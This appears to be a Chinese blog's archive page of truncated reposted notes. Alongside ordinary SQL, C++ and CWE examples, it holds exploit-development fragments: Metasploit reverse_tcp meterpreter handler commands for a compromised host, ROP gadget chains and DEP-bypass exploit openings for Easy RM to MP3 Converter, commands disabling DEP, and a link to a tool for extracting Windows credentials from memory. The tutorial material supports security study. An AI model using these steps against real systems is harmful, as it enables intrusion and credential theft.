- 博客(67)
- 资源 (3)
- 收藏
- 关注
RSS订阅转载 web.config加密解密方法
1.用.net Reflector查看代码2.在任意执行sql的地方,找到连接到数据库的语句,如DBData.GetDataDBCommand();3.进入DBData.GetDataDBCommand();,会出现DBCommand(xx.DataDBType, xx.DataDBConnString);4.xx.DataDBConnString就是解密后的内容
2016-05-15 01:22:44
559
1
转载 搜索数据库某列名
use 指定数据库;select sysobjects.name as tablename,syscolumns.name as columnnamefrom syscolumns join sysobjects on sysobjects.id = syscolumns.idwhere syscolumns.name like '%此处为列名%'
2016-05-01 10:35:27
593
转载 ftp上传文件
================保存为ftp.txt========open iprootpassput c:\downloads\xx.rarbye========================然后cmd运行ftp -i -s:c:\downloads\ftp.txt
2016-04-30 14:56:36
390
转载 RWMC:利用PowerShell提取Windows账号密码的利器
http://www.freebuf.com/tools/94559.htmlhttps://github.com/giMini/RWMC/tree/master/Reveal-MemoryCredentials
2016-01-27 23:12:46
1113
转载 创业板VOL-MY 10点研究
成功案例日期UpVsDown大盘UpVsDown(不计开盘)大盘UpVsDown(计开盘) 大盘低于-1%昨天B是否大涨大盘开口(昨天)10点指数距离开盘涨幅 2015.12.3 2.74 (1.74)1.111.11否否-1.1(1.7)
2015-12-23 12:40:52
454
转载 rp++ find ROP sequences
https://github.com/0vercl0k/rprp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. It is open-source and has been tested on several OS: Debian / Win
2015-12-20 11:22:38
547
转载 VC++ListBox(列表框)的使用
ListBox的操作比较简单1添加数据声明控件变量的类别为Control,变量类型为CListBox,变量名为m_ListBox_Content.m_ListBox_Content.AddString(_T("123"));m_ListBox_Content.AddString(_T("汉字"));m_ListBox_Content.AddString(_T("English"));m_L
2015-07-12 11:28:56
6872
转载 详细解说STL string
http://blog.chinaunix.net/uid-20357359-id-1963246.htmlc_str 取得C风格的const char* 字符串 list::iterator Iterator; Iterator=Player.begin(); printf("Player %s\n",Iterator
2015-07-04 11:43:14
486
转载 error C2065: “list”: 未声明的标识符
http://blog.youkuaiyun.com/friendan/article/details/9033577加入using namespace std;
2015-07-04 10:51:17
5639
1
转载 CWE-469: Use of Pointer Subtraction to Determine Size
http://cwe.mitre.org/data/definitions/469.htmlExample 1The following example contains the method size that is used todetermine the number of nodes in a linked list. The method is passed
2015-06-26 20:50:22
485
转载 CWE-134: Uncontrolled Format String
http://cwe.mitre.org/data/definitions/134.htmlExample 2The following code copies a command line argument into a bufferusing snprintf().(Bad Code)ExampleLanguage:C int main(in
2015-06-25 21:57:49
842
转载 CWE-234: Failure to Handle Missing Parameter
http://cwe.mitre.org/data/definitions/234.htmlExample 1(Bad Code)Example Languages:C and C++ foo_funct(one, two);...void foo_funct(int one, int two, int three) {p
2015-06-25 20:41:16
397
转载 CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
cwe.mitre.org/data/definitions/362.htmlExample 2The following function attempts to acquire a lock in order toperform operations on a shared resource.(Bad Code)ExampleLanguage:C
2015-06-25 20:15:31
904
转载 CWE-908: Use of Uninitialized Resource
http://cwe.mitre.org/data/definitions/908.htmlThe following code intends to concatenate a string to a variable andprint the string.(Bad Code)ExampleLanguage:C char str[20];st
2015-06-25 14:10:27
449
转载 CWE-681: Incorrect Conversion between Numeric Types
http://cwe.mitre.org/data/definitions/681.html函数的返回类型跟定义类型不一致!导致返回被隐蔽的转换!In this example, depending on the return value ofaccecssmainframe(), the variable amount can hold a negative value when
2015-06-24 20:45:34
461
转载 导出内容到文件
int LogToFile(char* pFilePath, WORD* pBuffer){ int nRetCode = 0; FILE* pFile; pFile = fopen(pFilePath, "a+"); if (NULL == pFile) { printf("Fail to open file!\n");
2015-05-30 20:54:41
371
转载 ReadProcessMemory与WriteProcessMemory用例分析 (转载)
http://blog.youkuaiyun.com/shifters/article/details/6750353
2015-05-30 15:15:23
603
转载 反弹stage shellcode到meterpreter
1.在肉鸡上运行stage1的shellcode2.在kali上运行metsploit framework3.执行下面的命令msf > use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/revers
2015-05-12 23:17:09
754
转载 wireshark 实用过滤表达式(针对ip、协议、端口、长度和内容)
首先说几个最常用的关键字,“eq” 和 “==”等同,可以使用 “and” 表示并且,“or”表示或者。“!" 和 "not” 都表示取反。 一、针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况: (1)对源地址为192.168.0.1的包的过滤,即抓取源地址满足要求的包。 表达式为:ip.src == 192.168.0.1 (
2015-05-11 21:45:09
398
转载 编写immunity debugger插件
__VERSION__ = '2.0'__REV__ = filter(str.isdigit, '$Revision: 557 $')__IMM__ = '1.8'__DEBUGGERAPP__ = ''arch = 32win7mode = False# try:# import debugger# except:# passtry:
2015-05-05 22:24:02
977
转载 编写Immunity Debugger插件的教程
https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/
2015-05-04 21:43:42
2061
转载 数组越界溢出利用2--修改前方的某个字符串的长度位,将长度位改为较大数值
http://bbs.pediy.com/archive/index.php?t-155555.html利用该数组越界漏洞,更改option cache前方的某个字符串的长度位,将长度位改为较大数值,这样该字符串就可以读取该字符串后面的所有数据,因为长度没有限制。通过获得该功能,先将该字符串所在虚拟空间的准确位置测算出。通过获得的准确位置和内存任意地址读取功能,获得刚才option数组的基地址
2015-05-03 23:05:51
468
转载 rop_gadgets使用方法
利用mona.py可以生成!mona rop -m msvcr71.dll -n这部分gadget能够将后面的shellcode变成可执行的代码段!,后面直接跟shellcode就ok了rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX
2015-05-02 15:11:19
2035
转载 Universal DEP/ASLR bypass with msvcr71.dll and mona.py
转载自:https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/IntroductionOver the last few weeks, there has been some commotion about a universal
2015-05-01 22:51:49
651
转载 bypass dep egg hunter
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/#-------------------------------------------------------------------#corelanc0
2015-05-01 21:30:40
742
转载 适合中文版本的Easy RM to MP3 Converter rop 过depexploit
#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be#-------------------------------------
2015-05-01 16:46:45
932
转载 Easy RM to Mp3 Converter测试rop的代码
my $file="rop.m3u";my $buffersize=26094-20-8-4;my $junk="A"x$buffersize;my $eip=pack('V',0x100102DC);#pointer to retmy $junk2="AAAA";#compensate,to make sure esp points at first rop gadgetmy
2015-05-01 10:14:43
450
转载 命令行下修改DEP
bcdedit.exe /set nx OptInbcdedit.exe /set nx OptOutbcdedit.exe /set nx AlwaysOnbcdedit.exe /set nx AlwaysOff
2015-04-28 22:47:46
794
转载 如何查看程序是否支持ASLR
使用工具PE EXPLOER打开,查看DllCharacteristics是否包含0x40就可以知道是否支持ASLR
2015-04-28 21:59:18
1326
转载 enter,leave汇编的作用,这个对理解UAC有用
enter语句的作用是:push ebpmov ebp,espsub esp,xxxleave语句的作用是add esp,xxxpop ebp
2015-04-26 09:50:13
524
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人